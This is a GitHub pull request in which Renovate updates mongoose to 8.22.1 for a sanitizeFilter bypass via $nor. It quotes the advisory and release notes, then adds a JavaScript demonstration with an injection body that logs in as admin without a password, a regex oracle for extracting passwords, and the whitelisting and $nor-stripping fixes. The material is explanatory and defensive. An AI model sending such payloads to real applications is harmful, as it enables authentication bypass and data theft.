
fix(deps): update dependency mongoose to v8.22.1 [security] #554

Open

renovate[bot] wants to merge 1 commit into main from renovate/npm-mongoose-vulnerability

Conversation

@renovate (Contributor) commented May 8, 2026

This PR contains the following updates:

Package            | Change           | Age | Confidence
mongoose (source)  | 8.19.0 → 8.22.1  |     |

Mongoose's Improper Sanitization of $nor in sanitizeFilter May Allow NoSQL Injection

CVE-2026-42334 / GHSA-wpg9-53fq-2r8h

Details

Impact

This vulnerability allows bypassing Mongoose’s sanitizeFilter query sanitization mechanism via the $nor operator.

When sanitizeFilter is enabled, Mongoose wraps query operators in $eq to neutralize them. However, prior to the fix, $nor was not included in the set of logical operators that are recursively sanitized. Because $nor accepts an array (like $and and $or), and arrays do not trigger hasDollarKeys(), malicious operators such as $ne, $gt, or $regex could be injected inside a $nor clause without being sanitized.

This may lead to:

  • Authentication bypass
  • Unauthorized data access
  • Data exfiltration

Affected users:

Applications that:

  • Explicitly enable sanitizeFilter
  • Pass unsanitized user-controlled input directly into query methods (e.g., Model.findOne(req.body)) and rely on sanitizeFilter to strip out query selectors

Applications that validate input schemas, whitelist fields, or avoid passing raw request bodies into queries are not affected. For example, Model.findOne({ user: req.body.user, pwd: req.body.pwd }) is not affected.

Patches

Patches have been released for all supported Mongoose release lines:

  • ^6.13.9
  • ^7.8.9
  • ^8.22.1
  • ^9.1.6

Workarounds

Delete $nor keys, use an additional schema validation library, or write middleware to strip out $nor from query filters.

Resources

sanitizeFilter documentation: https://mongoosejs.com/docs/api/mongoose.html#Mongoose.prototype.sanitizeFilter()

Original blog post on sanitizeFilter: https://thecodebarbarian.com/whats-new-in-mongoose-6-sanitizefilter.html

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

Automattic/mongoose (mongoose)

v8.22.1


  • fix: handle other top-level query operators in sanitizeFilter
  • fix(document): when cloning a doc with subdocs, make sure the subdocs parent is the cloned doc #15904 #15901
  • types(models): support Mongoose query casting in AnyBulkWriteOperation filter property #15910
  • types: add toBSON() to documents #15927

v8.22.0


8.22.0 / 2026-01-27

v8.21.1


  • fix(clone): fix parent doc for map subdocuments and array subdocuments #15958 AbdelrahmanHafez
  • fix(document): when cloning a doc with subdocs, make sure the subdocs parent is the cloned doc #15904 #15901
  • fix: respect currentTime schema option in bulkWrite updates #15976 sderrow
  • types(models): support Mongoose query casting in AnyBulkWriteOperation filter property #15910
  • types: add toBSON() to documents #15927

v8.21.0


  • feat(document+model): pass options to pre('deleteOne') and update+options to pre('updateOne') hooks #15908 #15870
  • feat(document): add support for getAtomics() to allow custom container types to utilize atomics #15817
  • fix: add support for typescript style enums #15914 #15913 mjfwebb

v8.20.4


v8.20.3


  • perf: use Object.hasOwn instead of Object#hasOwnProperty #15875 AbdelrahmanHafez
  • fix: improve error when calling Document.prototype.init() with null/undefined #15812 Vegapunk-debug
  • types(schema): avoid treating paths with default: null as required #15889
  • types(schema): allow partial statics to schema.statics() #15780

v8.20.2


v8.20.1


v8.20.0


v8.19.4


v8.19.3


  • fix(model+plugins): correctly apply shard key on deleteOne() #15705 #15701
  • fix(schema): correctly cache text indexes as 'text' not 1 #15695
  • types: make inferRawDocType correctly infer empty array type [] as any[] #15704 #15699

v8.19.2


  • perf(setDefaultsOnInsert): avoid computing all modified paths when running setDefaultsOnInsert and update validators, only calculate if there are defaults to set #15691 #15672
  • fix: correct handling of relative vs absolute paths with maps and subdocuments #15682 #15678 #15350
  • ci: add publish script with provenance #15684 #15680

v8.19.1


  • perf: avoid getting all modified paths in update when checking if versionKey needs to be set #15677 #15672
  • perf: Avoid needless path translation #15679 orgads
  • fix(query): throw error if using update operator with modifier and no path #15670 #15642
  • types: avoid making FilterQuery a conditional type because of how typescript handles distributed conditional unions #15676 #15671
  • docs: update installation instructions #15675 aalok-y

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
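The advisory above describes the bypass abstractly: sanitizeFilter wraps operator objects in $eq, recurses only into $and and $or, and treats an array value as operator-free, so a $nor array carrying $ne or $regex passes through untouched. The block below is an added example written for this page; it is not mongoose's code and not part of the PR. modelSanitizeFilter() is a simplified stand-in that follows the behaviour the advisory text describes (the real implementation may differ), matchClause() is a toy matcher for the handful of operators used, and the USERS list and request bodies are constructed. It runs the advisory's vulnerable pattern (Model.findOne(req.body)) against both the pre-fix and post-fix recursion sets, shows the inverted-regex exfiltration oracle, and then the two remedies the advisory names: whitelisting fields with a type check, and stripping $nor recursively.

```javascript
// Added example, not mongoose's code. modelSanitizeFilter() models the behaviour the
// advisory describes; the matcher and sample users are constructed so this runs in
// memory with no MongoDB or mongoose installed.

// Arrays never count as "having dollar keys", which is why a $nor array slips past.
function hasDollarKeys(obj) {
  return obj != null && typeof obj === 'object' && !Array.isArray(obj) &&
    Object.keys(obj).some((k) => k.startsWith('$'));
}

// Wrap operator objects in $eq; recurse only into the arrays of the listed logical operators.
function modelSanitizeFilter(filter, logicalOps) {
  if (filter == null || typeof filter !== 'object') return filter;
  if (Array.isArray(filter)) {
    filter.forEach((f) => modelSanitizeFilter(f, logicalOps));
    return filter;
  }
  for (const key of Object.keys(filter)) {
    const value = filter[key];
    if (logicalOps.includes(key) && Array.isArray(value)) {
      modelSanitizeFilter(value, logicalOps);
    } else if (hasDollarKeys(value)) {
      filter[key] = { $eq: value }; // an injected $ne/$gt/$regex now compares against a literal object
    }
  }
  return filter;
}
const VULNERABLE_OPS = ['$and', '$or'];        // pre-fix: $nor is not recursed into
const FIXED_OPS = ['$and', '$or', '$nor'];     // post-fix, per the advisory text

// Minimal in-memory matcher for the operators this example uses (assumption: toy, not MongoDB).
const deepEqual = (a, b) => JSON.stringify(a) === JSON.stringify(b);
function matchClause(doc, clause) {
  return Object.entries(clause).every(([key, cond]) => {
    if (key === '$and') return cond.every((c) => matchClause(doc, c));
    if (key === '$or') return cond.some((c) => matchClause(doc, c));
    if (key === '$nor') return !cond.some((c) => matchClause(doc, c));
    const actual = doc[key];
    if (!hasDollarKeys(cond)) return deepEqual(actual, cond);
    return Object.entries(cond).every(([op, arg]) => {
      switch (op) {
        case '$eq': return deepEqual(actual, arg);
        case '$ne': return !deepEqual(actual, arg);
        case '$regex': return typeof actual === 'string' && new RegExp(arg).test(actual);
        default: throw new Error(`operator ${op} not modelled here`);
      }
    });
  });
}
function findOne(collection, filter) {
  return collection.find((doc) => matchClause(doc, filter)) || null;
}

// Constructed sample users (hypothetical data).
const USERS = [
  { user: 'alice', pwd: 'correct horse' },
  { user: 'admin', pwd: 'hunter2' },
];

// The vulnerable pattern from the advisory: the raw request body is the filter and
// sanitizeFilter is trusted to neutralise operators. The body is deep-copied first.
function loginRaw(body, logicalOps) {
  const filter = modelSanitizeFilter(JSON.parse(JSON.stringify(body)), logicalOps);
  return findOne(USERS, filter);
}

// Attack body: $ne hidden inside $nor. NOT(user != 'admin') selects admin and never looks at pwd.
const ATTACK_BODY = { $nor: [{ user: { $ne: 'admin' } }] };

// Exfiltration variant: the login becomes an oracle for "does admin's pwd NOT start with prefix?",
// so a failed login means the guessed prefix was right. Prefix is assumed to be plain letters.
function pwdPrefixIsCorrect(prefix) {
  const body = { user: 'admin', $nor: [{ pwd: { $regex: '^' + prefix } }] };
  return loginRaw(body, VULNERABLE_OPS) === null;
}

// Remedy the advisory recommends: pick the fields explicitly and require strings,
// so neither $nor nor any other operator can reach the filter at all.
function loginWhitelisted(body) {
  if (typeof body.user !== 'string' || typeof body.pwd !== 'string') return null;
  return findOne(USERS, { user: body.user, pwd: body.pwd });
}

// Advisory workaround for code that cannot change the query yet: drop $nor keys recursively.
function stripNor(value) {
  if (Array.isArray(value)) return value.map(stripNor);
  if (value != null && typeof value === 'object') {
    return Object.fromEntries(
      Object.entries(value).filter(([k]) => k !== '$nor').map(([k, v]) => [k, stripNor(v)]));
  }
  return value;
}
```

Running loginRaw(ATTACK_BODY, VULNERABLE_OPS) returns the admin record with no password supplied; with FIXED_OPS the inner $ne is wrapped in $eq and admin is no longer singled out. Note that a $nor around a neutralised clause still matches every document in this model, exactly as an empty body `{}` does, which is why the advisory treats whitelisting (loginWhitelisted) rather than sanitizeFilter alone as the reason an application is unaffected; stripNor is only the stop-gap it lists under Workarounds.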

@sonarqubecloud commented May 8, 2026
